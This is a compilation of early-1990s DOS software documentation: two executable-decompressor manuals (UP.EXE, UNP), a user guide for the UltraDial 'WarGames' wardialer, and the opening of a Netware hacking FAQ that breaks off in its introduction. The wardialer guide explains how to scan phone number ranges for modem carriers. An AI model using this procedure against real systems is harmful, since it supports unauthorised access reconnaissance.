SOFTDOCS: UP.EXE Version 3.2 by Wong Wing Kin (1993)

UP.EXE V3.2 Copyright (c) 1990, 1991, 1992, 1993
by Wong Wing Kin
All rights reserved.

What is UP?

This is an utility for executable files decompression. It can
decompress EXE or COM compressed by DIET, PKLITE, LZEXE, EXEPACK,
COMPACK. It can also unpack unextractable EXE compressed by PKLITE.

What’s new?

v3.2
1. It can decompress all EXE with overlay.
2. The bug in decompressing pklited EXE is corrected.
3. It will not require unnecessary memory to decompress the EXE.
(It will need unnecessary memory to decompress overlayed EXE in
the previous versions.)

v3.1
1. It can now decompress DIETed overlayed EXE.
2. It can now recognize the EXE with corrupted compressor signature.

How to contact the author?

As I am now busy in my studies, I have no time to write a detail
document. If you find any problems in using this program, you can
contact the author through e-mail:

Internet address:
cs_wwkin@stu.ust.hk

Discliamer:

UP.EXE is supplied as is. The author disclaims all warranties,
expressed or implied, including, without limitation, the warranties
of merchantability and of fitness for any purpose. The author
assumes no liability for any damages, direct or consequential, which
may result from the use of, or inability to use UP.EXE.

SOFTDOCS: UNP 3.31 by Ben Castricum (April 15, 1994)

Ú¿  ÚÂÄ¿  ÂÂÄÄ¿ ÚÄÄ¿ ÚÄÄ¿ Ú¿
³³ ³ ³³ ³ ³ ³³ ³ ³³ ³³ Ä´³
³³ ³ ³³ ³ ³ ³ÃÄÄÙ ÄÄ´³ ÄÄ´³ ³³
³³ ³ ³³ ³ ³ ³³ ³³ Ú¿ ³³ ³³
ÀÁÄÄÙ ÀÙ ÀÄÙ ÀÙ ÀÄÄÁÙ ÀÙ ÀÄÄÁÙ ÄÁÁÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Written by Ben Castricum

April 15, 1994

This is the documentation belonging to and explaining the use of:

UNP V3.31
Compressed executable file expander

TOPICS covered in this document:

DISCLAIMER
PURPOSE OF UNP
REQUIREMENTS
GENERAL INFO
HOW TO USE UNP
UNP IN ACTION
MESSAGES
WHAT UNP CAN HANDLE
NOTES ON COMPRESSORS
ERRORLEVEL VALUES
WHERE TO FIND UNP
HOW TO REGISTER
CONTACTING ME

DISCLAIMER:
———–
Although UNP has been tested on several systems, I cannot guarantee that
UNP will be without bugs. Therefore, I do not take responsibility for any
damage directly or indirectly caused by UNP as a result of known or
unknown errors in it.

PURPOSE OF UNP:
—————
UNP tries to reverse the action which programs like PKLITE and LZEXE
perform. In case you don’t know, those programs use data compression on
executable files. Yet they leave these compressed files in a state such
that they can still be normally executed. This is great if you want to
save disk space, but it has its disadvantages. Anyone can now spread a
virus; just compress an infected file and the virus is invisible!
Debugging also becomes a lot more difficult since the code has become
unreadable. These are the primary reasons behind my writing UNP. I
could make up some story about loading/decompressing time, but we are
probably talking about a few 100ths of a second. Well, at least I don’t
notice any delay on my 66Mhz…

Not only can UNP expand compressed executable files, it is also able to
remove other kinds of routines from such programs. For instance,
Central Point’s Anti-virus ™ Immunize codes can be safely removed.
Though this removal is currently limited to only a few routines, in the
future this ability might be greatly expanded.

REQUIREMENTS:
————-
To run UNP you need at least a 8086 microprocessor. However if you want
to take full advantage of UNP, MS-DOS 5.0 (or higher) is recommended since
UNP tries to allocate UMBs. Lower versions of DOS will work without much
difference since UNP only uses base memory and UMBs. It requires about
15k of memory, with the additional amount of memory required depending on
the program being processed.

GENERAL INFO:
————-
Before you start using UNP, I would like to point out a few things which
you might take into consideration.

Compressed EXE files containing an overlay may not work correctly after
they have been decompressed. Decompression expands the code size of the
EXE file which also means that the overlay moves up. Some programs do not
check where the overlay currently is but just use a constant to get the
overlay. If this is the case, most anything can happen.

When you use UNP to convert a file to another structure, please take
into consideration that the converted program never runs under the exact
same conditions as it did before. Though these differences are likely
not to cause any problems with most programs, there are always programs
which expect just that what is changed by conversion.

One way to protect yourself against problems caused by such problems is
to use UNP’s -b which is .BAK backup file creation option to create a
copy of the original compressed file. If, after running the
uncompressed program you find an error, you can simply delete the bad
copy and rename the .BAK file.

HOW TO USE UNP:
—————
To get help type UNP on the command line without parameters or use the
‘-?’ switch. The first line of the help screen is a short line
describing how to pass information to UNP. Let’s analyze this step by
step.

usage: UNP command [options] [d:][/path]Infile [[d:][/path]Outfile]

* commands:
e = expand compressed file (default)
This command expands the compressed file. If you do not specify a
command, UNP will use this by default. Using this command without a
wildcard will result in unpacking all files in the current directory.

c = convert to COM file
Some .EXE files can be converted to .COM files. You can do this by
using this command. You should only convert a file when you know
exactly what you are doing (see general info section).

i = info only
If you just want some information about the file, this is the command
to use. UNP will show all information like the E command but will
will not decompress or write the file back.

l = load and save, no decompressing (only for EXE files).
This command loads an .EXE file but does not expand it. It will be
written back just like a decompressed file would be written back. This
is useful in case you want to remove an overlay or remove irrelevant
header data.

s = search for compressed files
When you use this command, only a small list of compressed files
matching the Infile wildcard will be generated. The list created will
be in the form of “filename.ext (compressor)”.

x = convert to EXE file
Some compressors can only compress .EXE files (like LZEXE). With this
command you can convert a .COM file to an .EXE file. The resulting
file will be written back with an .EXE extension by default.

* options:
-? = help (this screen)
For a list of UNP commands or options use this switch. Any other
switch or command used on the same line will be ignored.

-a = automatic retry
Some files have been altered more than once. This switch will make
UNP to process the file again when it was changed. Useful when you
want to uncompress a file which also has been Immunized by CPAV.

-b = make backup .BAK file of original
If you want to keep a backup of your original file (very wise) use this
switch. The original file will be renamed to a file with a .BAK
extension.

-c = ask for confirmation before decompressing
This will force UNP to ask you if you want to decompress the file each
time it has found a new compressed file.

-h = remove irrelevant header data
Most linkers add useless data to the .EXE header. This switch removes
all such useless information, thus shrinking the header size.

-i = do not intercept INT 21h calls
By default UNP watches the DOS interrupt (21h) to check if the program
is running as expected. Any unexpected call to INT 21h will make UNP
abort the process. If you have any weird TSRs resident you might have
to use this switch. I had to use it while debugging with Turbo
Debugger.

-k = pklite signature; – = don’t add, + = add always, ? = ask
With this switch you can handle the pklite signature. There are 3
possibilities :
-k- = the pklite signature will not be added, this will also be the
case if you only use -k (to stay dislite compatible)
-k+ = always add the pklite signature, this is the default of UNP so
you can just as well leave the -k switch away if you want this
-k? = when you use this, UNP will ask you each time it has found a
signature (like UNP V3.01 or earlier did)

-l = allways use loadfix
Starting with V3.12, UNP will not fill the first 64k of base memory.
(this allows larger files to be processed) When UNP detects a file
which does requires such a loadfix, it will reload the program with the
first 64k allocated. If you are planning to unpack several EXEPACKed
files you might want to use this switch to avoid reloading. This
switch can only improve UNP’s processing speed, it does not add
anything new.

-o = overwrite output file if it exists
If you want to have the destination file overwritten, you can avoid
the question for permission by specifying this switch on the command
line.

-p = align header data on a page
It is said that .EXE files with a header size that is a multiple of
512 bytes load faster (this could make sense since a sector is also
512 bytes). This switch will expand the header to the nearest
multiple of 512 bytes.

-r = remove overlay data
If something is appended to an .EXE it is called an overlay. This
switch will let the file size of the outfile be the same as the load
image. So anything that was appended to the file will be thrown away.
An overlay can be used for all kinds of data, so removing this can
result in throwing away something useful.

-u = update file time/date to current time/date
By default UNP sets the time/date of the destination file to the same
time/date as the original source file. If you want to have it updated
to the current time/date use this switch

-v = verbose
When you use this switch UNP will give you some additional information.
I added this switch for debugging purposes.

*[d:][/path]Infile
The wildcard UNP uses for selecting the files it will process can be
found as follows:
if you have specified a command but no Infile the wildcard ‘*.*’ will
be used. If you have specified an Infile ofcourse this will be used
except for wildcards without an extension; those will get ‘.*’ appended
and a flag will be set to select only .COM and .EXE files. If your
Infile ends with a ‘\’, ‘*.*’ will be appended.

*[[d:][/path]Outfile]
The destination file is optional. If you don’t specify one, the source
file will be overwritten. You cannot use wildcards in this. Also, you
should not specify a destination file when you want to decompress more
than one file.

UNP IN ACTION:
————–
When you execute UNP you can get several lines of information. Following
is an explanation of what those lines mean:

processing file : [D:][PATH\]FILENAME.EXT

This shows the name of the file being processed as specified on the
command line.

file size : X

The file size reported by DOS will be shown here.

file structure :

UNP recognizes 4 file structures:
– executable (EXE)
If the file starts with the ‘MZ’ or ‘ZM’ signature and does not
contain the ‘NE’ signature then this structure is assumed. With EXE
files there are two options UNP recognizes:
– convertible
The file can be converted to a COM file structure.
– loads into high memory
The program is loaded as high as possible in the allocated memory
block (this requires some other loading routines).

– Windows or OS/2 1.x new executable
The file starts with the ‘MZ’ or ‘ZM’ signature and contains the
‘NE’ signature.

– data file
The file does not contain the ‘MZ’ or ‘ZM’ signature but is too
large to be a COM file.

– binary (COM)
This is shown in all other cases.

EXE part sizes : header X bytes, code Y bytes, overlay Z bytes

Of course you will only get this line if you are processing an EXE file.
This shows how the file is built up. If you add X Y and Z you should
get the file size reported by DOS.

processed with :

If UNP recognizes some program’s work in the file, it will try to tell
you what program it recognizes and when possible what version of that
program. If UNP does not really know what program has changed your
file but recognizes some programs work then that programs name will be
displayed between brackets (e.g. [EXEPACK]). If you have got such a
file then there are two possibilities, UNP knows about this program but
it is just unsure about the name/version or UNP doesn’t know about it
at all. To find out if UNP knows about it, use the -v switch on this
program. If you got a message about breakpoints (see MESSAGES) then
UNP doesn’t know this routine, I appreciate it if you would send me
that program or tell me where to find it.

action :
UNP not only decompress files it has the ability to do other
things as well. There can only be one action performed at a time.
This is a list of actions UNP reports:

– decompressing… done
This is the decompression action, probably the most used action.

– removing immunize code… done
When a file has been immunized with Central Point Anti-Virus, a
piece of code is added to the file. UNP has the ability to remove
this code.

– removing scrambling… done
UNP recognizes a few scrambling routines. When you see this message
you have got a program which contains one.

– removing ‘XX’ signature
Starting with UNP V3.02, the PKLITE signature added to fake PKLITE
decompression can be removed. This message will be shown if UNP has
found a removable signature and is trying to remove it.

– converting to EXE file structure
The file will be converted to one with an .EXE file structure

– converting to COM file structure
The file will be converted to one with an .COM file structure

new size : X

When the file has been written back UNP reports the new file size to
you in this line.

All other messages are explained in the section below.

MESSAGES:
———
UNP has 6 kinds of messages other than the usual information it can display:

* Questions. Although I tried to make this program as smart as possible,
it still can’t read minds and things like that. So sometimes it will
ask you for something it wants to know.

Add ‘pk’/’PK’ signature to fake PKLITE decompression (y/n)?
This question will only appear if you use -k? on the command line.
Answering ‘Y’ to this question will add 14 bytes of code that fakes
PKLITE decompression. The correct signature will be displayed and used
automatically (‘pk’ for V1.20 and others ‘PK’).

File FILENAME.EXT already exists. Overwrite (y/n)?
The filename that UNP wants to write the resulting file to already
exists. If you haven’t specified the -o switch it will ask if it can
overwrite it. Answering ‘N’ will proceed to the next file.

Program is protected, please enter password:
This question will appear when you are trying to decompress a program
which is compressed with TINYPROG with the password option. You are
asked to type the password used. This is not to verify whether you are
the rightful owner or not, but I just couldn’t find a way around it.

Remove this routine from file (y/n)?
You have specified the -c switch and UNP has found a file it
recognizes as being processed with something. Now it wants to know
if you like to remove the routine it has found.

* INFO messages, these messages are only displayed when you have specified
the -V switch. I’ve added them for debugging purposes.

INFO- Attempting to increase available memory for decompression.
This only shows up if you are trying to decompress PKLITE V1.00á (2).
When this happens, UNP uses some other strategy to calculate the memory
it allocates for decompressing. By default UNP only allocates as less
memory as possible. This strategy allocates 15/16 of the memory block
the program is currently loaded in.

INFO – command line = ” … ”
This message shows how UNP has interpreted the things you typed on the
command line. Great for debugging purposes!

INFO – First 64K of base memory has been fully allocated.
Some compressors use the segment below their own code. Since it is
possible to load the operating system in upper/high memory there might
not be a complete segment available. This message tells you there has
been memory allocated to ensure there is a complete segment below.
Note that this is the same thing that the program LOADFIX.COM supplied
with MS-DOS 5 does.

INFO – Overlay copy overruled, overlay not copied to destination file.
Normally UNP copies any overlay found on the original program to the
destination. This is one of the exceptions. CRUNCHER and SEA-AXE use
the overlay to store the compressed data for the file. Copying the
overlay would result in a program containing twice its code, once in
compressed and once in the decompressed form. This message indicates
that UNP has removed the overlay to avoid this problem.

INFO – Program loaded at XXXXh, largest free memory block: X bytes.
Pretty obvious. The address where UNP is loaded is displayed along
with the largest block it can allocate.

INFO – Unknown program, breakpoints are : GS-XXXX, GI-XXXX, QT-XXXX.
Some routines that I am using are a bit better than the rest because
they try to determine offsets rather than comparing signatures. If
such a smart routine has found breakpoints but can not find any
identification string belonging to these, this message is shown with
the breakpoints it has found.

INFO – Using FILENAME.EXT as temp file.
UNP tells you what it will be using as temporary file. This name is
composed of the TEMP variable and the default temporary name.

INFO – Wildcard matches X filename(s), stored at XXXXh.
This tells you how many filenames UNP has found that match the wildcard
and where it has stored the names found.

* WARNING messages. UNP sometimes takes actions the user should be
notified of. In those cases a warning message is displayed.

WARNING – Adding ‘XX’ signature to fake PKLITE decompression.
The program you are decompressing was compressed by PKLITE V1.14 or
higher with extra compression. By default UNP adds 14 bytes of code
that will let the program think it is still compressed. To remove
this piece of code you can use UNP E on it.

WARNING – File adds ‘XX’ signature (added by UNP V3.01 or earlier).
WARNING – File adds ‘XX’ signature (added by DISLITE V1.15 or higher).
Your file has already been decompressed and has the signature to fake
PKLITE decompression appended. This signature is ignored to continue
the search for more decompression routines.
All signatures added by UNP V3.02 or higher and the DISLITE signatures
which do not use a relocation item will act as a decompression routine,
so UNP E will remove them.

WARNING – File already has .BAK extension, no backup created.
UNP has just unpacked a .BAK file and you have specified the -B switch.
Creating a .BAK file of a file which already has a .BAK extension is
impossible so the source file will be overwritten and there will be no
backup created.

WARNING – File loaded too low in memory to decompress, reloading.
Files compressed with EXEPACK require one segment (64k) below their own
code to successfully decompress. When there is no complete segment
available, UNP displays this message and reloads the file higher in
memory. (also see msg. ‘INFO – First 64K…’ and -L switch)

WARNING – Infile and Outfile are same, Outfile ignored.
You have specified the file twice on the command line, meaning that the
destination file is the same as the source file. Since this is the
default situation the second name is ignored.

WARNING – Invalid or missing stored header information.
Normally the compressor used on the program you are trying to
decompress stores a part of the original header. UNP has compared
this information with the data it thinks it should be and has come to
the conclusion that these mismatch. If this happens the default UNP
header will be used.

WARNING – Missing last byte, unable to completely restore file.
The SHRINK compressor does not correctly compresses files containing
all 256 characters. When this has happened the last byte of the
program is thrown away. It’s not possible to get that byte back so the
decompressed file is mismatching in 1 or more bytes at the end with the
original file.

WARNING – Outfile specified, -B option ignored.
You have specified a destination file and the -B switch. Because I see
no sense in this, the -B option will then be ignored.

* ERROR messages. In some cases the desired action cannot be performed or
has failed. These messages tell you why this is so and what has
happened. UNP will continue with the next file.

ERROR – Cannot handle this decompression routine.
UNP has recognized the way your program has been compressed but is not
(yet) able to decompress it.

ERROR – File already is a .COM file.
You are trying to convert a .COM file to a .COM file.

ERROR – File already is an .EXE file.
You are trying to convert a .EXE file to a .EXE file.

ERROR – File contains overlay.
One thing you can’t have with .COM files is overlays. If you want to
convert anyway first remove the overlay.

ERROR – File has invalid entrypoint (CS:IP <> FFF0h:0100h)
To have a converted .EXE file start at the right place, the programs
initial CS:IP should point to FFF0:0100h. If this is not true you get
this error message.

ERROR – File has relocation items.
You tried to convert an .EXE file with relocation items to a .COM file.
A .COM file cannot handle relocation items.

ERROR – File is too large for .COM file.
The maximum size for a .COM file is much shorter than the one for an
.EXE file. So it can happen that the .EXE file is too large to be
converted to a .COM file.

ERROR – Unexpected call to INT 21h, decompression failed.
When decompressing, UNP passes control to the program. When it does
not get control back it is very likely that an interrupt 21h will take
place sooner or later (INT 21h is the most important interrupt). UNP
checks for unexpected calls to this interrupt to ensure it’s still in
control. To disable this checking use the -i switch.

* DOS ERROR messages, these errors are things UNP tried to do but for some
reason your Operating System didn’t allowed it. UNP will quit and will
have the I/O ERROR exit code. If you find any use for UNP you are
probably an experienced DOS user and know how to solve the problem so I
will only give you the messages.

DOS ERROR – unable to create file

DOS ERROR – unable to open file

DOS ERROR – unable to read from file

DOS ERROR – unable to write to file

* FATAL ERROR messages. When one of those messages appear something is
really wrong and UNP cannot continue its work. It will quit and
probably have an exitcode for the situation occurred.

FATAL ERROR – Decompressing many files into one.
You have specified a destination file, but there is more than one
source file.

FATAL ERROR – Divide overflow (INT 00h) generated by CPU.
This means that an invalid DIV instruction has been executed.
Normally this will cause DOS to terminate the program. UNP hooks this
so it can set the interrupt’s pointers back before the program quits.

FATAL ERROR – No files found matching FILENAME.EXT
UNP could not find any files to decompress.

FATAL ERROR – Not enough memory …
UNP tried to allocated some memory but it got an error back. This
message tells you what it needed the memory for.

FATAL ERROR – Output path/file must not contain ‘*’ or ‘?’.
You have used wildcards in the destination file. This is not allowed.

FATAL ERROR – User abort, ^C/^Break pressed (INT 23h).
Interrupt 23h is called when DOS detects that Ctrl-C or Ctrl-Break is
pressed. UNP hooks this to be able to restore the interrupts it uses.

WHAT UNP CAN HANDLE:
——————–
Of course you would like to know what programs UNP can currently handle.

Well, here is a list of routines that UNP V3.15 is known to remove:

* routines found in .COM files
CENTRAL POINT ANTI-VIRUS V1 ; immunize code
COMPACK V4.4
COMPACK V4.5
DIET V1.00
DIET V1.02b or V1.10a
DIET V1.20
ICE V1.00
PKLITE V1.00á
PKLITE V1.03
PKLITE V1.05
PKLITE V1.12
PKLITE V1.13
PKLITE V1.14
PKLITE V1.15
PROTECT! COM/EXE V1.0 or V1.1
PROTECT! COM/EXE V2.0
PROTECT! COM/EXE V3.0
PROTECT! COM/EXE V3.1
PRO-PACK V2.08, emphasis on packed size
PRO-PACK V2.08, emphasis on packed size, locked
PRO-PACK V2.08, emphasis on unpacking speed
PRO-PACK V2.08, emphasis on unpacking speed, locked
SCRNCH V1.00
SHRINK V1.00

* routines found in .EXE files
CENTRAL POINT ANTI-VIRUS V1 ; immunize code
COMPACK V4.4
COMPACK V4.5
CRUNCHER V1.0 ; +.COM files
DIET V1.01
DIET V1.00d ; small & large, with & without items
DIET V1.02b, V1.10a or V1.20 ; small & large, with & without items
DIET V1.44 ; small, large + .COM files
DIET V1.44, choose great SFX routine ; small, large + .COM files
DIET V1.45f ; small, large + .COM files
DIET V1.45f choose great SFX routine ; small, large + .COM files
DISLITE V1.15 or higher ; small signatures (no items in sig)
EXEPACK V4.00
EXEPACK V4.05 or V4.06
EXEPACK patched with EXPAKFIX V1.0
LINK /EXEPACK V3.60 or V3.64
LINK /EXEPACK V5.31.009
KVETCH V1.02á
LZEXE V0.90
LZEXE V0.91 or V1.00a
PGMPAK V0.14
PKLITE V1.00á 0,1,2
PKLITE V1.03 0,1,2,3
PKLITE V1.05 0,1,2
PKLITE V1.10 3
PKLITE V1.12 0,1,2,3
PKLITE V1.13 0,1,2,3
PKLITE V1.14 0,1,2,3
PKLITE V1.15 0,1,2,3
PKLITE V1.20 1
PKLITE V1.20 1,3
PRO-PACK V2.08, emphasis on packed size
PRO-PACK V2.08, emphasis on packed size, locked
PRO-PACK V2.08, emphasis on unpacking speed
PRO-PACK V2.08, emphasis on unpacking speed, locked
PROTECT! COM/EXE V1.0
PROTECT! COM/EXE V1.1
PROTECT! COM/EXE V2.0
PROTECT! COM/EXE V3.0
PROTECT! COM/EXE V3.1
SEA-AXE
TINYPROG V1.0
TINYPROG V3.3
TINYPROG V3.6
TINYPROG V3.8
TINYPROG V3.9
UNP V3.02 or higher ; fake PKLITE signature

(Sorry, I lost count. Who cares about statistics anyway?)

NOTES ON COMPRESSORS:
———————
LZEXE V1.00a:
Several people have contacted me about this one. This utility is the
same as LZEXE V0.91, except for some minor options. It is offered
to the readers of INFO PC by IS2 France Diffusion (at least that’s what
I think the text says). Unfortunately I don’t know where it’s
available.

PGMPAK V0.14:
When you compress a file with this compressor, an overlay of 12 bytes
will be added. To be exactly, the name and version number is added.
In this case: “PGMPAK V0.14”. This overlay is not automatically removed
when you decompress it. To remove it, use the -R switch.

PKLITE:
PKLITE V1.00á seems to have a bug in it. While testing it, I found
that with some files an overlay of 512 bytes was added. Needless to
say that when this happened the compressed file did not run correctly.
Since UNP writes the file back as it would be run in memory the file
decompressed with UNP wouldn’t run either. However extracting with
PKLITE -X resulted in the original file! Since this version of pklite
is hardly used and even more unlikely is that someone wants to
decompress such a file I didn’t bother to write a new routine that
fixes that bug.

PKLITE V1.14 and up (according to the documentation) add the ‘PK’
signature with extra compressed files to let the program check if it is
still compressed with PKLITE. To avoid that the program detects it has
been decompressed UNP adds by default 14 bytes of code that places the
signature in the PSP like PKLITE does.

SCRUNCH:
In most cases, UNPs decompression routines are created when using
test files. Unfortunately I don’t have a copy of scrunch so this is
a bit difficult to ensure it works. Of course there are other
decompression routines built the same way but the file I received
compressed with this compressor looked like it was converted to a
.COM file before it was compressed (it contained relocation items),
but this conversion could just as well be a part of the scrunch
compression. If I receive more files compressed with this one I will
improve and adjust the routine when needed.

SHRINK V1.00:
This compressor is a bad implementation of Run Length compression. It
contains two bugs one of which is in the decompression routine. The
bugs are triggered when the file to be compressed contains all 256
bytes. I have written my own decompression routine for this compressor
that is able to avoid one bug. The other bug is that the last byte of
the compressed file is thrown away making it impossible to fully
rebuild the file. If this is the case, UNP will display a warning. It
is always better to decompress it, even if the last byte is missing.

ERRORLEVEL VALUES:
——————
0 no error occurred
1 help text is displayed
2 no files found to process
3 decompressing many files into 1 / Outfile contains wildcards
4 some I/O error occurred
5 could not allocate enough memory
6 CPU generated divide overflow
7 user pressed ^C or ^Break

WHERE TO FIND UNP:
——————
Latest version of unp will be uploaded to Garbo (garbo.uwasa.fi) as long
as I have access to Internet. Also this BBS below will have the latest
version.

MegaVolt BBS (support site of unp)
tel. +31-30-211143
speeds up to 14k4

HOW TO REGISTER:
—————-
I have decided to release UNP as freewhere (cardware). You are allowed to
test this program freely for a period of two weeks. If you decide to
continue using UNP you are expected to let me (the author) know where you
are using my program. To do this, send a postcard with some picture of
your city or something in the neighbourhood to the adress found at the end
of the document. I would appreciate if you would mention your full name
and version you are using. Ofcourse if you have got any suggestions you
can put them on it as well!

Please don’t feel offended by all of this, I just want to how much people
find any use for UNP. And hey, it beats sending money!

CONTACTING ME:
————–

My address: E-Mail (atleast valid till June-95):
Ben Castricum benc@solist.htsa.aha.nl
Van Loenenlaan 10
1945 TX Beverwijk
The Netherlands

*** end of UNP V3.31 documentation ***

The Ultimate in Wargames Dialers: UltraDial 3.0 Documentation by Paul Levy

…How About A Nice Game Of Chess…

The
Ultimate
In WarGames
Dialers

————————————–
U L T R A – D I A L
————————————–
VERSION 3.0: THE FINAL FRONTIER!
= By: Paul Levy =

/**\
\ <******> /
<********>

<********>
/ <******> \
\**/

Software Creations For The IBM-PC

The author of this software takes no responsibility for what
occurs during the use of this program. It is distributed
completely free of charge and nothing is expected in return
except that you follow the following guide lines:

1) This software is not to be distributed in a modified
form…including any and all documentation that comes with the
software.
2) This software is not to be distributed for any fee. It’s
author has chosen to distribute it free of charge.
3) This software was not intended for malicious use. Do not use
for any type of illegal computing…under penalty of law.

If you wish to get in contact with the author of this
software or any of the Com-Worx software, you may contact the
Com-Worx RBBS Bulletin Board system in Southern California at
(818) 986-1673. If you find this product well written and user-
friendly, why not try some of the other Com-Worx software such as
Super-File, the “People-Information” manager.

———————————————————————

The idea of writing a WARGAMES dialer was inspired by Steve Klein who
wrote the original DIAL.BAS. I took this program and proceeded to cre-
ate DIAL1 and DIAL3 (Steve Klein took DIAL1 and enhanced it to DIAL2).
I began to get sick of constantly updating so I decided to write the
most incredible dialer around, and I think I have succeded. In the
first version of ULTRA-DIAL (ULTRA.EXE), there were many problems, in-
cluding the fact that it did NOT support the Hayes External Modem,
this minor error was fixed and a few other features were added into
ULTRA2.EXE, the next version. I though I had it all down pat with this
version, but my “good ol'” users clued me in to some problems…and
here it is folks, ULTRA3.EXE. I would like everyone to know that this
will be the last version of ULTRA-DIAL, UNLESS I find some incredible
error or some new incredible request for a feature is made. So, you’ll
have to live with this one.

REMEMBER: This program is for the IBM Personal Computer PC or XT (not
AT or any compatible). You must have a Hayes modem (an Anchor Signal-
man may work, it has not been tested) to operate this program. There
is absolutely no exceptions to this…sorry.

Now we’ll cut the lecture and start the documentation!

———————————————————————

** MINIMUM HARDWARE REQUIREMENTS

To operate UltraDial 3.0, you need at least the following:

An IBM Personal Computer
64k Memory
One Floppy Disk Drive
A Hayes Auto-Dial Modem

To operate UltraDial 3.0 with optimum performance, add:

An 80 Coulumn Printer
128k Memory
A RAMdrive Program

** TO BEGIN

To start UltraDial, place the disk that contains
ULTRA3.EXE in drive A: and type:

A>ULTRA3

Within a few moments, a text screen should appear telling
you the rules of Com-Worx. Press a key and you will see the
title screen begin. After the “COM-WORX Presents…” portion, you
will be asked to select COM1: or COM2:, that is communications port
number 1 or communications port #2. Enter the port to which your
modem is connected to (enter a 1 or a 2).
Then you will see the main title screen…press any key to go
further…
The program will then ask you to set the time and date. If
it is already set, simply hit at each of the prompts.
Finally the menu screen will appear and you will have the
following options:

[B]egin a dialing routine
[S]can/Dial found numbers
[P]rint a copy of numbers
[C]ontact the author
[D]elete old numbers
[Q]uit to DOS

These options are explained in detail on the following
pages of this documentation…

** BEGIN A DIALING ROUTINE

This command is the master command of the entire program,
it sets the dialing in motion. You will be using this command
whenever you wish to start dialing…

Your first prompt will be “Do you wish to delete old
numbers that have been found?”. This simply means, do you want
to erase the file that contains the previously found numbers
with carriers and start with a fresh one, or do you want to save
them. Answer “Y” to start a fresh new file, or enter “N” to save
the old one (remember, Ultra3 can only handle 18 numbers per file
because of some problems, print out the file often and start a
fresh one when possible).
The second option is simple, “Do you want the modem speaker
on?”. Answer “Y” if you want the Hayes internal speaker on, and
answer “N”, if you want it off (this is also togglable during the
program operation).
Ok, now you are going to enter the vital numbers that will
make this program run. The next prompt, after the speaker prompt,
is the “PRELIMINARY NUMBER” prompt. This is a new feature to ULTRA
DIAL and I will try to explain it the best I can.
Whatever you enter at the PRELIMINARY NUMBER prompt will be
dialed before EVERY number. This can be helpful for obtaining an
outside line (i.e. hotels and buisnesses sometimes require you dial
a “9” before dialing the outside number you wish to reach). If you
have no use for this, simply hit , if you do want to use this
function, enter the number(s) you wished to be dialed before EVERY
number in the dialing sequence.
Now you are going to enter the starting and ending numbers! Your
first prompt will be to enter the area code, if you want to dial local
simply hit , if not, enter the three digit area code.
The next prompt will be for the beginning number, this will be
the first number to be dialed. Here are some examples of the right
and wrong way to enter numbers:

RIGHT: 9861673 WRONG: 986-1673
5205547 5,205547

*** REMEMBER: DO NOT USE HYPHENS, COMMAS, ETC. JUST ENTER THE NUMBER!

The next prompt will be for the ending number, the last number
to be dialed. Use the same format as you saw above.
Now the dialing begins…Your options are now held in function
keys (the darker keys on the left side of the keyboard). There func-
tions are described here…

[F1] – SKIP # – allows you to skip on to the next phone number.
For example, if the computer is on 986-1673 and
you hit [F1] then it will skip to 986-1674 as
soon as you hear the beep.

[F2] – MAIN – takes you directly to the main menu and stops all
active dialing. (Quits to the menu)

[F3] – QUIT – ends the dialing and returns you to DOS.

[F4] – PAUSE – pauses the timer so as to allow more waiting time
and continues to hold the timer until you hit any
key (remember to re-start it with any key).

[F5] – SPKR – toggles the speaker on or off. When pressed, the
screen will clear and you will be asked if you
want the speaker on or off, then dialing will re-
sume from the number you left off on.

*** REMEMBER: THE FUNCTION KEYS TAKE A FEW MOMENTS TO RESPOND!

If the dialer finds a carrier at a certain number, it beeps,
saves the number to disk, and continues dialing. If it completes
the dialing routine by getting to the last number, it sounds an
alarm to inform you (until you press any key). You are then
returned to the main menu.

** SCAN/DIAL FOUND NUMBERS

This function allows you to see up to 18 of the found
numbers in the file NUMBERS. You can select a number with the up
and down cursor keys on the right side of the keyboard. If at
first the arrow does not move when you hit the cursor up or down,
try hitting . When you have the arrow pointing at the
number you wish to try, hit .
The computer will enter a terminal mode. Anything you type
now will go straight to the modem. The computer will dial the
number you selected and wait for a carrier. When it receives a
carrier, it will connect at 300 baud, even parity, 7 data bits,
and 1 stop bit.
To exit the terminal mode and return to the main menu, hit
the key, up in the left hand corner of the keyboard. It
will ask if you wish to dial another number and you may respond
accordingly with “Y” or “N”.

** PRINT A COPY OF NUMBERS

This function will print a copy of all of the phone numbers
onto the printer. Also, the dates and times that the numbers
were found will be printed. When the printing is complete, the
computer will return to the main menu…

*** CONTACT THE AUTHOR

This function was just “an idea” that I thought would encourage
people to report errors more often because it would be so simple to
conatct me. This function will simply enter the terminal mode and
dial The COM-WORX RBBS…Hit to hang-up and exit…

** DELETE OLD NUMBERS

This function will erase the file NUMBERS which contains all
of the phone numbers that have been found. You should use this
at least every 18 numbers found.

** QUIT TO DOS

This function drops you into DOS (use only when you are
finished using Ultra-Dial).

—————————————————————–
THIS SOFTWARE WAS WRITTEN BY PAUL LEVY…A PROGRAMMER WITH OVER
FIVE YEARS OF BASIC PROGRAMMING WITH MICROSOFT BASIC. IF YOU
HAVE ANY IDEAS FOR ANY PROGRAMS THAT YOU WOULD LIKE TO SEE,
PLEASE CONTACT PAUL LEVY AT HIS BBS, 818-986-1673. ENJOY…
—————————————————————–
EASE CONTACT PAUL LEVY AT HIS BBS, 818-986-1673. ENJOY…
—————————————————————–

The Unofficial Netware Hack FAQ Beta Version 3 by Simple Nomad

From the Nomad Mobile Research Centre:

Frequently Asked Questions
About
Hacking Novell Netware

“The Unofficial Netware Hack FAQ”

Beta Version 3

Compiled by Simple Nomad

Contributions (and thanks to):

The LAN God
Teiwaz teiwaz@wolfe.net
Fauzan Mirza fauzanm@jumper.mcc.ac.uk
Jeff Carr jcarr@kpmg.com.au
David A Wagner daw@lagos.CS.Berkeley.EDU
Diceman diceman@fl.net.au
PEME_Inc

Extra thanks to BioHazard, Mickey, and Al Payne for their kindness in
redistribution of the FAQ. And hello to several friends – Mr. Wizard, The
Raven, Riker, Route, B.C. And thanks to many others who requested anonymity
or didn’t realize they were contributing 😉

Tech Support (and special thanks to):

itsme – infamous Netware Netherlands hack fame

Been real busy playing with Netware 4.1, and it shows. You asked for it,
you got it. Netware 4.1 hack info, straight from the insecure LANs of
corporate and education locations everywhere. I’ve also received a lot of
email, particularly since Al’s HTML version of the FAQ is getting accessed
pretty heavily. The main question I am asked is by Admins – am I secure? I
